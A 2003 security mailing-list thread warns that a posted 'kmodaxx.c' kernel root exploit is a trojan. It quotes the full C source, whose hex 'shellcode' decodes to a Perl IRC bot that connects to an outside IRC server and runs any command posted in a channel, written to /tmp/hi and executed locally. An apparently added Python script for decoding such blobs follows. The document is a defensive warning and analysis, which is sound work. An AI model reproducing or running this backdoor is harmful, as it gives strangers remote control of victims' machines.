Open Source and information security mailing list archives (lists.openwall.net)
Message-ID: <200306131720.16886.gml@phrick.net>
From: gml at phrick.net (gml)
Subject: Re: -1 day exploit - Warning

On Friday 13 June 2003 03:57 pm, Brian Houk wrote:

Wow, I'd never run something that had a printf statement in it with

    print $sock "JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that ran a fake 0day exploit. v2\nPRIVMSG $chan :to run commands on me, type: ".$nick.": command\n";

If you run this you deserve to get owned. This guy could have at least xor'd the strings and base64 encoded them or SOMETHING.

> Actually I should have made my previous e-mail a little bit more clear.
>
> DO NOT RUN THIS
>
> Just a warning. . .
>
> > [03:37] chigoo (521@...-3-1a.um.bonet.se) joined #linuxhelp.
> > [03:37] <chigoo> new root exploit is out to slackware 9.1 and redhat 9.1!
> > enjoy....be nice to your frinds boxes!:>
> > http://home.no/exploited/exploits/kmodaxx.c
> >
> > Attached is the so called exploit, and the perl code it runs locally on
> > your machine. #darknet already has a ban on moron*!*@*
> >
> > print $sock "JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that ran a fake 0day exploit. v2\nPRIVMSG $chan :to run commands on me, type: ".$nick.": command\n";
> >
> > nice
> >
> > #include <stdio.h>
> > #include <sys/types.h>
> > #include <sys/socket.h>
> > #include <unistd.h>
> > #include <netinet/in.h>
> > #include <netinet/udp.h>
> > #include <netinet/ip.h>
> > #include <string.h>
> >
> > /*
> >  * *** http://hack.co.za ***
> >  * ******** DISTRIBUTED 12.06.03 ********
> >  *
> >  * remote kernel root exploit, tested on slackware 9.1, redhat 9.1. (kernels 2.4.2*)
> >  * exploits a race condition in kernel, allowing to take control over
> >  * privileged modprobe binary, and gives u root.
> >  *
> >  * This exploit must be run as root on source box to open a raw socket.
> >  * compile: gcc -o kmodaxx kmodaxx.c
> >  * run: ./kmodaxx ip
> >  * and u got a nice r00tshell.
> >  *
> >  * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*
> >  * IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY
> >  *
> >  * - c1sco darknet@...et
> >  */
> >
> > h3llc0de=
> > "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a\x24\x63"
> > "\x68\x61\x6e\x3d\x22\x23\x64\x61\x72\x6b\x6e\x65\x74\x22\x3b\x24\x6e\x69"
> > "\x63\x6b\x3d\x22\x6d\x6f\x72\x6f\x6e\x22\x3b\x24\x73\x65\x72\x76\x65\x72"
> > "\x3d\x22\x65\x66\x6e\x65\x74\x2e\x76\x75\x75\x72\x77\x65\x72\x6b\x2e\x6e"
> > "\x6c\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d\x3d\x7b\x7d\x3b\x65"
> > "\x78\x69\x74\x20\x69\x66\x20\x66\x6f\x72\x6b\x3b\x75\x73\x65\x20\x49\x4f"
> > "\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3b\x24\x73\x6f\x63\x6b\x20\x3d\x20\x49"
> > "\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3a\x3a\x49\x4e\x45\x54\x2d\x3e\x6e"
> > "\x65\x77\x28\x24\x73\x65\x72\x76\x65\x72\x2e\x22\x3a\x36\x36\x36\x37\x22"
> > "\x29\x7c\x7c\x65\x78\x69\x74\x3b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63"
> > "\x6b\x20\x22\x55\x53\x45\x52\x20\x6d\x6f\x72\x6f\x6e\x20\x2b\x69\x20\x6d"
> > "\x6f\x72\x6f\x6e\x20\x3a\x6d\x6f\x72\x6f\x6e\x76\x32\x5c\x6e\x4e\x49\x43"
> > "\x4b\x20\x6d\x6f\x72\x6f\x6e\x5c\x6e\x22\x3b\x24\x69\x3d\x31\x3b\x77\x68"
> > "\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x3d\x7e\x2f\x5e\x5b\x5e\x20"
> > "\x5d\x2b\x20\x28\x5b\x5e\x20\x5d\x2b\x29\x20\x2f\x29\x7b\x24\x6d\x6f\x64"
> > "\x65\x3d\x24\x31\x3b\x6c\x61\x73\x74\x20\x69\x66\x20\x24\x6d\x6f\x64\x65"
> > "\x3d\x3d\x22\x30\x30\x31\x22\x3b\x69\x66\x28\x24\x6d\x6f\x64\x65\x3d\x3d"
> > "\x22\x34\x33\x33\x22\x29\x7b\x24\x69\x2b\x2b\x3b\x24\x6e\x69\x63\x6b\x3d"
> > "\x7e\x73\x2f\x5c\x64\x2a\x24\x2f\x24\x69\x2f\x3b\x70\x72\x69\x6e\x74\x20"
> > "\x24\x73\x6f\x63\x6b\x20\x22\x4e\x49\x43\x4b\x20\x24\x6e\x69\x63\x6b\x5c"
> > "\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22"
> > "\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x50\x52\x49\x56\x4d\x53"
> > "\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x48\x69\x2c\x20\x49\x6d\x20\x61\x20"
> > "\x6d\x6f\x72\x6f\x6e\x20\x74\x68\x61\x74\x20\x72\x61\x6e\x20\x61\x20\x66"
> > "\x61\x6b\x65\x20\x30\x64\x61\x79\x20\x65\x78\x70\x6c\x6f\x69\x74\x2e\x20"
> > "\x76\x32\x5c\x6e\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20"
> > "\x3a\x74\x6f\x20\x72\x75\x6e\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x73\x20\x6f"
> > "\x6e\x20\x6d\x65\x2c\x20\x74\x79\x70\x65\x3a\x20\x22\x2e\x24\x6e\x69\x63"
> > "\x6b\x2e\x22\x3a\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x5c\x6e\x22\x3b\x77\x68"
> > "\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f"
> > "\x5e\x50\x49\x4e\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e"
> > "\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x50\x4f\x4e\x47\x20\x24\x31\x5c\x6e"
> > "\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x22\x3b\x7d\x69\x66\x28"
> > "\x73\x2f\x5e\x5b\x5e\x20\x5d\x2b\x20\x50\x52\x49\x56\x4d\x53\x47\x20\x24"
> > "\x63\x68\x61\x6e\x20\x3a\x24\x6e\x69\x63\x6b\x5b\x5e\x20\x3a\x5c\x77\x5d"
> > "\x2a\x3a\x5b\x5e\x20\x3a\x5c\x77\x5d\x2a\x20\x28\x2e\x2a\x29\x24\x2f\x24"
> > "\x31\x2f\x29\x7b\x73\x2f\x5c\x73\x2a\x24\x2f\x2f\x3b\x24\x5f\x3d\x60\x24"
> > "\x5f\x60\x3b\x66\x6f\x72\x65\x61\x63\x68\x28\x73\x70\x6c\x69\x74\x20\x22"
> > "\x5c\x6e\x22\x29\x7b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22"
> > "\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x24\x5f\x5c"
> > "\x6e\x22\x3b\x73\x6c\x65\x65\x70\x20\x31\x3b\x7d\x7d\x7d\x23\x63\x68\x6d"
> > "\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f\x64"
> > "\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69";
> >
> > unsigned short csum(unsigned short *buf, int nwords)
> > {
> >     unsigned long sum;
> >     for(sum=0;nwords>0;nwords--);
> >         sum+=*buf++;
> >     sum=(sum>>16)+(sum&0xffff);
> >     sum+=(sum>>16);
> >     return ~sum;
> > }
> >
> > unsigned short in_cksum(unsigned short *addr,int len)
> > {
> >     register int nleft=len;
> >     register unsigned short *w=addr;
> >     register int sum=0;
> >     unsigned short answer=0;
> >     while(nleft>1)
> >     {
> >         sum+=*w++;
> >         nleft-=2;
> >     }
> >     if(nleft==1)
> >     {
> >         *(u_char *)(&answer)=*(u_char *)w;
> >         sum+=answer;
> >     }
> >     sum=(sum >> 16)+(sum & 0xffff);
> >     sum+=(sum >> 16);
> >     answer=~sum;
> >     return(answer);
> > }
> >
> > int main(int argc, char **argv)
> > {
> >     int sockfd;
> >     struct sockaddr_in addr;
> >     char *payload=h3llc0de;
> >     char *buf;
> >     struct iphdr *iph;
> >     struct udphdr *tcph;
> >     int tot_len;
> >     FILE *f;
> >     int die=0;
> >
> >     if(argc!=2)
> >     {
> >         printf("ERROR: No ip address entered\n");
> >         printf("usage:\n%s [IP-ADDRESS]\n\n",argv[0]);
> >         die=1;
> >     }
> >
> >     addr.sin_family=AF_INET;
> >     addr.sin_port=htons(5555);
> >     if(argc==1) argv[1]="";
> >     addr.sin_addr.s_addr=inet_addr(argv[1]);
> >
> >     sockfd=socket(AF_INET,SOCK_RAW,IPPROTO_UDP);
> >     if(sockfd==-1 && !die) {printf("could not obtain raw socket\nARE YOU ROOT?\n");die=1;}
> >
> >     tot_len=sizeof(struct iphdr)+sizeof(struct udphdr)+strlen(payload);
> >     buf=(char *)malloc(tot_len);
> >
> >     malloc(buf,0,tot_len);
> >
> >     iph=(struct iphdr*)buf;
> >     tcph=(struct udphdr*)(buf+sizeof(struct iphdr));
> >
> >     iph->ihl=5;
> >     iph->version=4;
> >     iph->tos=0;
> >     iph->tot_len=tot_len;
> >     iph->id=htons(31337);
> >     iph->frag_off=0;
> >     iph->ttl=225;
> >     iph->protocol=IPPROTO_UDP;
> >     iph->check=0;
> >     iph->saddr=inet_addr("127.0.0.1"); // spoof the source to make it untracable
> >     iph->daddr=inet_addr(argv[1]);
> >     iph->check=in_cksum((unsigned short *)&iph,sizeof(iph));
> >
> >     tcph->source=htons(31337);
> >     tcph->dest=htons(139); // the default SMB port
> >     tcph->len=htons(sizeof(struct udphdr)+strlen(payload));
> >     tcph->check=0;
> >     memcpy(buf+sizeof(struct iphdr)+sizeof(struct udphdr),payload,strlen(payload));
> >
> >     f=fopen(h3llc0de+764,"w");
> >     if(f)
> >     {
> >         fseek(f,0,SEEK_SET);
> >         close(2);
> >         fprintf(f,"%s",h3llc0de);
> >         fclose(f);}system(h3llc0de+735);
> >
> >     {
> >         int one=1;
> >         const int *val = &one;
> >
> >         if(setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,val,sizeof(one))<0 && !die)
> >             printf("warning: cannot set HDRINCL\n");
> >     }
> >
> >     if(sendto(sockfd,buf,tot_len,0,(struct sockaddr *)&addr,sizeof(addr))<0 && !die)
> >         printf("err\n");
> >     else if (!die) printf("NUKED THA MOTHA!!! :D\n");
> >     return 0;
> > }
> >
> >
> > #!/usr/bin/perl
> > $chan="#darknet";
> > $nick="moron";
> > $server="efnet.vuurwerk.nl";
> > $SIG{TERM}={};
> > exit if fork;
> > use IO::Socket;
> > $sock = IO::Socket::INET->new($server.":6667")||exit;
> > print $sock "USER moron +i moron :moronv2\nNICK moron\n";
> > $i=1;while(<$sock>=~/^[^ ]+ ([^ ]+) /){$mode=$1;
> > last if $mode=="001";
> > if($mode=="433"){
> > $i++;
> > $nick=~s/\d*$/$i/;
> > print $sock "NICK $nick\n";
> > }
> > }
> > print $sock "JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that ran a fake 0day exploit. v2\nPRIVMSG $chan :to run commands on me, type: ".$nick.": command\n";
> > while(<$sock>){
> > if (/^PING (.*)$/) {print $sock "PONG $1\nJOIN $chan\n";
> > }
> > if(s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/){s/\s*$//;
> > $_=`$_`;
> > foreach(split "\n"){print $sock "PRIVMSG $chan :$_\n";
> > sleep 1;
> > }
> > }
> > }#chmod +x /tmp/hi 2>/dev/null;/tmp/hi
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
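The practical lesson of this thread is to decode a "shellcode" blob and read it before compiling anything around it. The script below is an added example written for this page; it is not code from the mail or from the kmodaxx.c poster. It parses the concatenated "\x.." C literal, checks whether the bytes are machine code or a script, and resolves pointer-offset arguments of the kind kmodaxx.c passes to fopen(h3llc0de+764) and system(h3llc0de+735). It runs on a constructed 54-byte stub of the same shape (the offsets 47 and 30 belong to that stub, not to the page). Against the full 771-byte h3llc0de above, the same two calls resolve to "/tmp/hi" and "chmod +x /tmp/hi 2>/dev/null;/tmp/hi": the script is written out and executed before sendto() and regardless of whether the raw socket ever opened, so running the "exploit" as an unprivileged user still joins the bot to IRC.

```python
"""Triage a C 'shellcode' literal before compiling anything around it.

Added example (not code from the page or from the poster): decode the
concatenated "\\x.." C string, check whether it is machine code or a
script, and resolve the pointer offsets the surrounding C passes to
fopen()/system(), the trick used by the kmodaxx.c fake above.
"""
import re

# One C string literal: a double-quoted run of escapes or plain characters.
_LITERAL = re.compile(r'"((?:\\.|[^"\\])*)"', re.S)
# Escapes inside a literal: \xHH (1-2 hex digits is enough for triage; a real
# C compiler keeps eating hex digits), \ooo octal, and single-char escapes.
_ESCAPE = re.compile(r'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})|\\(.)', re.S)
_SIMPLE = {'n': b'\n', 't': b'\t', 'r': b'\r', 'a': b'\a', 'b': b'\b',
           'f': b'\f', 'v': b'\v', '\\': b'\\', '"': b'"', "'": b"'"}


def _unescape(body: str) -> bytes:
    out, pos = bytearray(), 0
    for m in _ESCAPE.finditer(body):
        out += body[pos:m.start()].encode('latin-1')
        if m.group(1) is not None:
            out.append(int(m.group(1), 16))
        elif m.group(2) is not None:
            out.append(int(m.group(2), 8) & 0xFF)
        else:
            out += _SIMPLE.get(m.group(3), m.group(3).encode('latin-1'))
        pos = m.end()
    out += body[pos:].encode('latin-1')
    return bytes(out)


def decode_c_literal(src: str) -> bytes:
    """Join adjacent "..." "..." literals the way the compiler does, then
    resolve their escapes to raw bytes."""
    return b''.join(_unescape(m.group(1)) for m in _LITERAL.finditer(src))


def blob_initializer(src: str, name: str) -> bytes:
    """Pull the string initializer of `name` (name = "..." "...";) out of C source."""
    m = re.search(re.escape(name) + r'\s*=\s*((?:\s*"(?:\\.|[^"\\])*")+)', src, re.S)
    if not m:
        raise ValueError(f'no string initializer for {name}')
    return decode_c_literal(m.group(1))


def classify(blob: bytes) -> str:
    """Cheap tell: machine code is mostly non-printable; a blob that starts
    with '#!' or is almost entirely printable text is a script, not shellcode."""
    if blob.startswith(b'#!'):
        return 'script'
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in blob)
    return 'text' if blob and printable / len(blob) > 0.95 else 'binary'


def offset_uses(src: str, name: str) -> list:
    """Find calls of the form callee(name+N ...): pointer arithmetic into the
    blob means a tail of it is meant to be read as a C string."""
    pat = re.compile(r'(\w+)\s*\(\s*' + re.escape(name) + r'\s*\+\s*(\d+)')
    return [(m.group(1), int(m.group(2))) for m in pat.finditer(src)]


def cstr_at(blob: bytes, offset: int) -> bytes:
    """What fopen(blob+offset) or system(blob+offset) sees: bytes from offset
    to the first NUL, or to the end (where the compiler's terminating NUL is)."""
    if not 0 <= offset <= len(blob):
        raise ValueError('offset lies outside the literal')
    end = blob.find(b'\0', offset)
    return blob[offset:] if end < 0 else blob[offset:end]


def triage(src: str, name: str) -> dict:
    blob = blob_initializer(src, name)
    return {
        'length': len(blob),
        'kind': classify(blob),
        'first_line': blob.split(b'\n', 1)[0],
        'uses': [(callee, off, cstr_at(blob, off)) for callee, off in offset_uses(src, name)],
    }


# Constructed sample with the same shape as kmodaxx.c: a hex-encoded Perl
# stub whose tail is a shell command, plus the fopen()/system() offset calls.
# The offsets (47, 30) are for this 54-byte stub, not the page's 771-byte blob.
SAMPLE_C = r'''
h3llc0de=
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a\x65\x78"
"\x69\x74\x20\x69\x66\x20\x66\x6f\x72\x6b\x3b\x23\x63\x68\x6d\x6f\x64\x20"
"\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x3b\x2f\x74\x6d\x70\x2f\x68\x69";

f=fopen(h3llc0de+47,"w");
fprintf(f,"%s",h3llc0de);
fclose(f);system(h3llc0de+30);
'''

if __name__ == '__main__':
    report = triage(SAMPLE_C, 'h3llc0de')
    print(f"{report['length']} bytes, kind={report['kind']}, starts {report['first_line']!r}")
    for callee, off, s in report['uses']:
        print(f'{callee}(h3llc0de+{off}) -> {s!r}')
```

To use it on a real sample, paste the C source into `SAMPLE_C` (or read the file) and keep the variable name; the interesting output is the `uses` list, because any call that takes the blob plus a constant is treating part of the "shellcode" as a path or a command line on the box that runs the exploit, not on the target.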